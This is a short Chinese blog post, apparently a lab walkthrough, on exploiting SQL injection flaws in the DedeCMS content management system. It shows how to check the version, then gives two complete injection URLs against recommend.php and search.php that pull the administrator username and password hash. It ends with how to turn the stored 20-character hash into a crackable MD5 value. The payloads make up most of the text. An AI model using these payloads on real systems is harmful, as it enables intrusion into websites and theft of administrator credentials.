版权声明:本文为原创文章,未经作者允许不得任何个人、组织、机构以任何形式与名义进行转载 https://blog.csdn.net/qq_23217779/article/details/88547055
首先访问靶机上的dedecms
访问/data/admin/ver.txt页面获取系统最后升级的时间,查看一下最后的升级时间,以及版本号是否与这个漏洞对应
然后访问/member/ajax_membergroup.php?action=post&membergroup=1
若返回如下界面则表明可以进行sql注入
接下来在url中写入payload
http://IP:8081/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
会直接爆出用户名和密码
在search.php页面也存在注入漏洞
/plus/search.php?keyword=as&typeArr[111%3D@\')+and+(SELECT+1+FROM+(select+count(),concat(floor(rand(0)2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@\'+]=a
同样也可得到管理员用户名和密码散列值
很多从网上直接复制粘贴过来的POC直接粘贴在地址栏是无法攻击成功的,原因在于复制过来的内容里携带了很多换行符,要放在word里去掉换行符才可以看到效果
dedecms的密码使用了MD5_16加密算法加密后经过晕车生成一个20位字符串,密文是用密码通过32位的MD5加密再除去前5位后7位产生的,32位密文转换成16位其实就是取中间的16位,也就是在前后分别去除8位。那么在20位密文中只要去除前3位和后1位就可以得到16位密文了。